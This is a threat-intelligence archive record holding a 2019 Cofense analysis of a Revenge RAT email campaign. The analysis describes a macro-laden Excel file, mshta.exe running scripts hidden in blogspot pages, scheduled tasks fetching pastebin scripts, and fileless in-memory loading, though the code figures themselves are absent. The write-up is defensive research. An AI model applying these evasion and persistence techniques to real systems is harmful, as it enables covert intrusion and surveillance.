{
	"id": "8e804b2b-e84d-4eb4-b6ca-d4b0fdb21aee",
	"created_at": "2026-04-06T00:15:17.63916Z",
	"updated_at": "2026-04-10T03:21:48.490963Z",
	"deleted_at": null,
	"sha1_hash": "94945f67f4a60eba2d131a12df1cb7c2efeab60f",
	"title": "With Upgrades in Delivery and Support Infrastructure, Revenge RAT Malware is a Bigger Threat - Cofense",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 176923,
	"plain_text": "With Upgrades in Delivery and Support Infrastructure, Revenge\r\nRAT Malware is a Bigger Threat - Cofense\r\nBy Max Gannon\r\nPublished: 2019-02-11 · Archived: 2026-04-05 23:00:15 UTC\r\nCISO Summary\r\nThe Revenge RAT malware is getting stealthier, thanks to unusually advanced delivery techniques and support\r\ninfrastructure. Cofense IntelligenceTM has recently seen this basic and widely available Remote Access Trojan\r\nbenefit from these upgrades, which help it to access webcams, microphones, and other utilities as Revenge RAT\r\ndoes recon and tries to gain a foothold in targeted computers. When they succeed, RATs enable threat actors to\r\nwreak havoc, including monitoring user behavior through keyloggers or other spyware, filching personal\r\ninformation, and distributing other malware.\r\nWith redundant command and control infrastructure masked as legitimate content, threat actors can deliver a\r\nsample of Revenge RAT without leaving files on disk. Revenge RAT uses a Microsoft Office Excel Worksheet\r\nwith an Office macro to infect targets. Scripts are run in the HTML of a custom-built blogspot.com page. The\r\ncomplex infection chain, focus on maintaining persistence, and tactics to evade detection add up to a sophisticated\r\nthreat.\r\nFull Details\r\nCofense Intelligence recently observed an email campaign delivering Revenge RAT that exhibited above- average\r\nsophistication in its delivery technique and persistence mechanisms. Revenge RAT is a simple and freely available\r\nRemote Access Trojan that automatically gathers system information before allowing threat actors to remotely\r\naccess system components such as webcams, microphones, and various other utilities. This can enable threat\r\nactors to perform reconnaissance and establish a beachhead for further activities. In this campaign, threat actors\r\nused redundant command and control infrastructure disguised as legitimate content to deliver a sample of Revenge\r\nRAT without leaving files on disk.\r\nThe initial infection vector of this campaign is a Microsoft Office Excel Worksheet with an Office macro that uses\r\nthe mshta.exe Windows executable to run scripts, which are embedded in the HTML of a specially-crafted\r\nblogspot.com page. The page, 29[.]html, contains two distinct sections of scripts. The scripts create scheduled\r\ntasks and also retrieve, decode, and execute a copy of Revenge RAT.\r\nBreaking it Down\r\nIn the example script shown in Figure 1, the first task (“MS-OFFICE”) is set to run a script (urGHE2PF) hosted\r\non a secondary command and control location on pastebin every 10 minutes.\r\nhttps://web.archive.org/web/20200428173819/https://cofense.com/upgrades-delivery-support-infrastructure-revenge-rat-malware-bigger-threat/\r\nPage 1 of 4\n\nFigure 1: Code from 29[.]html scheduling the first task to run a script from pastebin\r\nThe second task (“MSOFFICEER”) in Figure 2 runs the script contents of a different page of the same blog, blog-page[.]html, every 100 minutes.\r\nFigure 2: De-obfuscated code scheduling the second task to run a script embedded in a blog page\r\nThe last section of script embedded in 29[.]html then downloads Revenge RAT and injects the binary into the\r\nmemory of a running process, as seen in Figure 3.\r\nFigure 3: Script code embedded in 29[.]html used to download and run Revenge RAT\r\nThe script shown in Figure 4 is almost identical to the one used by the script contents of 29[.]html (in Figure 3),\r\nthe only difference being the absence of a sleep command and the usage of the “forfiles” utility.\r\nFigure 4: Similar code used to download Revenge RAT and inject the binary into memory\r\nFinally, the script contents of blog-page[.]html schedule the same task (“MSOFFICEER”) to run itself. Revenge\r\nRAT used in this instance is not dropped to disk but is instead loaded into the memory of a process using the\r\n“Reflection.Assembly” PowerShell command. A similar method is used to execute the script content of the\r\ncommand and control locations rather than dropping the scripts to disk and then running them. By scheduling\r\ntasks to run scripts and binaries in memory rather than on disk, the threat actors are able to avoid some traditional\r\nmeans of detection.\r\nHidden Content\r\nThe primary command and control location used in this campaign is hosted on a blog on blogspot[.]com, which\r\nenables the threat actors to hide their malicious content behind a legitimate service. Even if the web pages are\r\ndirectly visited in a browser, they appear to be underdeveloped, but do not have any visible malicious (Figure 5).\r\nhttps://web.archive.org/web/20200428173819/https://cofense.com/upgrades-delivery-support-infrastructure-revenge-rat-malware-bigger-threat/\r\nPage 2 of 4\n\nFigure 5: How the blog-page[.]html web page appears when visited in a browser\r\nThe malicious content cannot be run in a browser; it only runs when mshta.exe is used, which also prevents the\r\ncontent from being recognized by most web debuggers. It is only by viewing the source code of these pages that\r\nany malicious content becomes viewable (Figure 6).\r\nFigure 6: The script embedded in the blog-page[.]html web page\r\nAs shown in Figure 7, decoding the script contents shown in Figure 6 reveals the same code as we saw in Figure\r\n2, which schedules the execution of the page content.\r\nFigure 7: The same de-obfuscated code as Figure 2\r\nThe only other script content of the blog-page[.]html is an empty script section. By repeatedly “self-scheduling”\r\nthe execution of the blog-page[.]html, the threat actor ensures that any content they add to this empty script\r\nhttps://web.archive.org/web/20200428173819/https://cofense.com/upgrades-delivery-support-infrastructure-revenge-rat-malware-bigger-threat/\r\nPage 3 of 4\n\nsection will also be executed. The script self-scheduling, as well as the scheduling of a script that repeatedly\r\nattempts to download and execute the Revenge RAT binary, significantly contribute to the persistence of this\r\ninfection. In both cases, the threat actor can modify the hosted content at any time as needed, such as in the case of\r\ninfrastructure failure or payload change. The frequent checking ensures that any changes made will be quickly\r\nfollowed, and the repeated attempts to run the Revenge RAT binary make it almost certain that even if the process\r\nis terminated, the RAT will be running again soon.\r\nImplications of This Malware\r\nThe complex infection chain, redundant command and control infrastructure, focus on maintaining persistence,\r\nand attempts to evade detection exhibited by this campaign indicate an above average level of sophistication.\r\nHigher levels of sophistication require higher levels of expertise and an increased understanding of the threats\r\norganizations face. By preparing employees and training them to be alert to threats, organizations can better\r\nprotect themselves. Learn how Cofense PhishMeTM conditions users to recognize and report the latest phishing\r\nand malware campaigns.\r\nAll third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise,\r\nremain the property of their respective holders, and use of these trademarks in no way indicates any relationship\r\nbetween Cofense and the holders of the trademarks.\r\nSource: https://web.archive.org/web/20200428173819/https://cofense.com/upgrades-delivery-support-infrastructure-revenge-rat-malware-bigg\r\ner-threat/\r\nhttps://web.archive.org/web/20200428173819/https://cofense.com/upgrades-delivery-support-infrastructure-revenge-rat-malware-bigger-threat/\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://web.archive.org/web/20200428173819/https://cofense.com/upgrades-delivery-support-infrastructure-revenge-rat-malware-bigger-threat/"
	],
	"report_names": [
		"upgrades-delivery-support-infrastructure-revenge-rat-malware-bigger-threat"
	],
	"threat_actors": [],
	"ts_created_at": 1775434517,
	"ts_updated_at": 1775791308,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/94945f67f4a60eba2d131a12df1cb7c2efeab60f.pdf",
		"text": "https://archive.orkl.eu/94945f67f4a60eba2d131a12df1cb7c2efeab60f.txt",
		"img": "https://archive.orkl.eu/94945f67f4a60eba2d131a12df1cb7c2efeab60f.jpg"
	}
}